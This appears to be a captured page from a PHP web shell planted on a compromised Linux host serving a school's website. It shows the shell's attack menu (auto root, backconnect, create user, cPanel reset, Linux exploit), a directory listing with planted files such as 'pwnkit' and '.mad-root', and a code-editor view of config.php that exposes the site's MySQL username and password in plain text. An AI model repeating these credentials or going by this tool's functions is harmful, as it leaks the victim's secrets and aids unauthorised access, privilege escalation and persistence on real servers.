Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.133.151.90
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
khuiansarwar /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
files
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
gacor
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lontejitu
[ DIR ]
drwxr-xr-x
myadmin
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.htaccess
197
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
about.php
13.47
KB
-rwxr-xr-x
academic.php
10.43
KB
-rwxr-xr-x
addmission.php
1.76
KB
-rwxr-xr-x
affidavit.php
1.37
KB
-rwxr-xr-x
affiliation.php
1.38
KB
-rwxr-xr-x
annual-report.php
1.38
KB
-rwxr-xr-x
bootstrap.php
79.58
KB
-rw-r--r--
calender.php
1.39
KB
-rwxr-xr-x
cbse-corner.php
3.3
KB
-rwxr-xr-x
config.php
630
B
-rwxr-xr-x
contact.php
1.79
KB
-rwxr-xr-x
environment.php
1.28
KB
-rwxr-xr-x
error_log
141.22
MB
-rwxr-xr-x
favicon.ico
2.56
KB
-rwxr-xr-x
footer.php
6.11
KB
-rwxr-xr-x
gallery.php
1.53
KB
-rwxr-xr-x
header.php
8.25
KB
-rwxr-xr-x
image.php
109.97
KB
-rw-r--r--
index.php
21.2
KB
-rw-r--r--
infrastructure.php
1.38
KB
-rwxr-xr-x
khuiansarwar.zip
27.78
MB
-rwxr-xr-x
net.html
1.72
KB
-rw-r--r--
news-coverage.php
1.32
KB
-rwxr-xr-x
pwnkit
0
B
-rwxr-xr-x
school-managing-commit.php
1.4
KB
-rwxr-xr-x
students-class-wise.php
1.39
KB
-rwxr-xr-x
tc-sample.php
1.37
KB
-rwxr-xr-x
tc.php
1.22
KB
-rwxr-xr-x
teacher-qualify.php
1.39
KB
-rwxr-xr-x
teacher-training.php
1.38
KB
-rwxr-xr-x
theschool.php
4.22
KB
-rwxr-xr-x
wp-blog-header.php
4.57
KB
-rw-r--r--
wp-cron.php
4.57
KB
-rw-r--r--
z.htm
2.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php $mysql_host="localhost"; $mysql_user="akal_dbadminacademy"; $mysql_password="2bPUx)uW@W.i"; $mysql_dname="akal_Khuiansarwar_AA"; date_default_timezone_set('asia/Kolkata'); $con= mysqli_connect($mysql_host, $mysql_user, $mysql_password, $mysql_dname) or die (mysqli_error()); if($con !=null) { echo '<h1> </h1>'; } else { echo '<h1>MySQL Server is not connected</h1>'; } session_start(); if(isset($_SESSION['login']) == 1){ echo "<script type='text/javascript'>window.location.replace = 'index.php'</script>"; } else { echo "<script type='text/javascript'>window.location.replace = 'login.php'</script>"; } ?>
Close